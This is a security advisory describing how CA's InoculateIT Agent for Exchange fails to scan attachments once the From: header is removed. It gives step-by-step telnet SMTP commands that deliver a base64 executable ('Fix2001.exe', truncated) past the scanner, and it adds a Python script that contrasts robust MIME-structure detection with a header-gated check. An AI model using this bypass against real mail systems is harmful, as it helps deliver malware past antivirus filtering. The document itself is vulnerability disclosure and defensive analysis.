COMMAND

    CA's InoculateIT

SYSTEMS AFFECTED

    CA's InoculateIT Agent for Exchange Server

PROBLEM

    Hugo Caye found the following.  CA's InoculateIT Agent for Exchange
    Server cannot detect some messages whose SMTP headers have been
    changed.  In October 1999 he reported it to the local CA support
    office, but as of now nothing has been done.  The people at
    inoc-nt@ca.com seem to ignore his messages.

    The bug can easily be demonstrated by telnetting to tcp/25 on an
    Exchange Server with IMC (the MS SMTP connector/service).  Simply
    change some SMTP headers and CA's AVEX Agent does not even open the
    infected attached file.  It is not a signature issue, since the
    same happens when sending CA's own virtest.com sample file.  Any
    file can be sent, since the AVEX Agent does not recognize the
    message as having an attached file at all.

    Something like the following can easily be done:
    1. Get a message containing any infected MIME-encoded attachment.
       Hugo simply sent one from outside to EX and filtered it out via
       EX into C:\TurfDir;
    2. Edit the file (I used MS Notepad.exe) and just remove the
       "From: ..." line from the SMTP header.  Something like this:

        ==>> Remove this line: From: Test <Test@abc.com.br>
        To: Hugo Caye <Hugo@xyz.com.br>
        Subject: Test
        Date: Mon, 23 Oct 2000 10:59:53 -0200
        MIME-Version: 1.0
        X-Mailer: Internet Mail Service (5.5.2650.21)
        Content-Type: application/x-msdownload;
	        name="Fix2001.exe"
        Content-Transfer-Encoding: base64
        Content-Disposition: attachment;
	        filename="Fix2001.exe"
        
        TVqQAAMAAAAEAAAA//8AALgAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
        AAAAAAAAAAsAAAAA4fug4AtAnNIbgBTM0hVGhpcyBwcm9ncmFtIGNhbm5vdCBiZSBydW4g
        aW4gRE9TIG1vZGUuDQ0KJAAAAAAAAABjDAXbJ21riCdta4gnbWuIJ21riGRta4ikcWWIJm
        1riFJpY2gnbWuIAAAAAAAAAABQRQAATAEDAJ/L0zcAAAAAAAAAAOAADwELAQUMABoAAAAA
        AgAAAAAAABAAAAAQAAAAMAAA... <<== Removed the rest here;

    3. Copy the Notepad content to clipboard;
    4. Issue "telnet your_exsrvr 25" command:

        220 aaa.xyz.com.br ESMTP Server (Microsoft Exchange Internet Mail
        Service 5.5.2650.21) ready
        helo
        250 OK
        mail from:<>
        250 OK - mail from <>
        rcpt to:<hugo@xyz.com.br>
        250 OK - Recipient <hugo@xyz.com.br>
        data
        354 Send data.  End with CRLF.CRLF
        
        ==>> Here, paste from clipboard (Win2K, just a mouse right-click).
        Something like this:
        
        To: Hugo Caye <Hugo@xyz.com.br>
        Subject: Test
        Date: Mon, 23 Oct 2000 10:59:53 -0200
        MIME-Version: 1.0
        X-Mailer: Internet Mail Service (5.5.2650.21)
        Content-Type: application/x-msdownload;
                name="Fix2001.exe"
        Content-Transfer-Encoding: base64
        Content-Disposition: attachment;
                filename="Fix2001.exe"
        
        TVqQAAMAAAAEAAAA//8AALgAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
        AAAAAAAAAAsAAAAA4fug4AtAnNIbgBTM0hVGhpcyBwcm9ncmFtIGNhbm5vdCBiZSBydW4g
        aW4gRE9TIG1vZGUuDQ0KJAAAAAAAAABjDAXbJ21riCdta4gnbWuIJ21riGRta4ikcWWIJm
        1riFJpY2gnbWuIAAAAAAAAAABQRQAATAEDAJ/L0zcAAAAAAAAAAOAADwELAQUMABoAAAAA
        AgAAAAAAABAAAAAQAAAAMAAA... <<== Removed...
        ....AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
        AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
        
        
        .
        250 OK
        quit
        221 closing connection

    5. The message is delivered, and CA's Agent will not detect the
       infected file.

    This is one way to exploit the Agent.  There are at least two more
    holes.
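    The failure described above is a parser-differential problem: the
    Agent's decision whether a message carries an attachment depends on
    header lines that have nothing to do with the MIME structure, while
    Exchange happily delivers the message.  The script below is an added
    example (not part of the original report and not CA's code): it
    rebuilds the test message from the headers shown above, with and
    without the From: line, and walks the MIME structure with Python's
    email package so the attachment is found either way.  The
    brittle_scan function is a hypothetical illustration of the
    header-gated failure class, not a description of how InoculateIT
    actually works; the base64 body is a constructed sample made of the
    first 64 characters of the MZ header shown in the report, which
    decodes to an executable prefix and nothing more.

```python
"""Structure-based attachment detection for mail with incomplete headers.

Added example for the InoculateIT report above; not part of the original
advisory and not CA's code.  The sample message is constructed from the
headers quoted in the report; the body is a 48-byte MZ header prefix.
"""
import email
from email import policy

# Constructed sample: first 64 base64 chars of the MZ header from the report
# (64 chars == 48 decoded bytes, starting with the "MZ" executable magic).
MZ_PREFIX_B64 = "TVqQAAMAAAAEAAAA//8AALgAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"


def build_sample(include_from: bool) -> bytes:
    """Return the test message as raw SMTP DATA, with or without From:."""
    headers = []
    if include_from:
        headers.append("From: Test <Test@abc.com.br>")
    headers += [
        "To: Hugo Caye <Hugo@xyz.com.br>",
        "Subject: Test",
        "Date: Mon, 23 Oct 2000 10:59:53 -0200",
        "MIME-Version: 1.0",
        "X-Mailer: Internet Mail Service (5.5.2650.21)",
        "Content-Type: application/x-msdownload;",
        '\tname="Fix2001.exe"',            # folded continuation line
        "Content-Transfer-Encoding: base64",
        "Content-Disposition: attachment;",
        '\tfilename="Fix2001.exe"',
    ]
    return ("\r\n".join(headers) + "\r\n\r\n" + MZ_PREFIX_B64 + "\r\n").encode()


def find_attachments(raw: bytes) -> list:
    """Walk the MIME tree and report every part carrying file content.

    The decision is keyed on MIME structure and decoded bytes, never on
    whether the envelope-style headers (From:, To:, ...) are present.
    """
    msg = email.message_from_bytes(raw, policy=policy.default)
    found = []
    for part in msg.walk():
        if part.is_multipart():
            continue
        ctype = part.get_content_type()
        disp = part.get_content_disposition()   # 'attachment', 'inline' or None
        name = part.get_filename()              # filename= or name= parameter
        payload = part.get_payload(decode=True) or b""
        # Anything with a filename, an attachment disposition, or non-text
        # content is a candidate that must reach the scanner.
        if name or disp == "attachment" or not ctype.startswith("text/"):
            found.append({
                "filename": name,
                "content_type": ctype,
                "disposition": disp,
                "size": len(payload),
                "mz_header": payload[:2] == b"MZ",   # DOS/PE executable magic
            })
    return found


def brittle_scan(raw: bytes) -> list:
    """Hypothetical header-gated check (illustrative only, not CA's code).

    It inspects the body only once the message 'looks like mail', i.e. has
    both From: and To:.  Dropping From: therefore hides the attachment,
    which is the class of bug the report describes.
    """
    head, _, _body = raw.partition(b"\r\n\r\n")
    names = {line.split(b":", 1)[0].strip().lower()
             for line in head.split(b"\r\n") if b":" in line}
    if not {b"from", b"to"} <= names:
        return []        # treated as malformed: nothing is scanned at all
    return find_attachments(raw)


if __name__ == "__main__":
    for variant in (True, False):
        raw = build_sample(include_from=variant)
        print("From: present" if variant else "From: removed")
        print("  brittle_scan     ->", brittle_scan(raw))
        print("  find_attachments ->", find_attachments(raw))
```

    The structure-based walk reports the same Fix2001.exe part, 48 bytes
    with an MZ signature, for both variants; the header-gated variant
    reports nothing once From: is gone.  A content filter in front of an
    MTA should therefore hand every non-text or named part to the scanner
    regardless of which message headers happen to be present.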

    We are not talking about  the weaknesses of embedded messages  and
    server based rules.

SOLUTION

    Both big holes have been recognized by CA.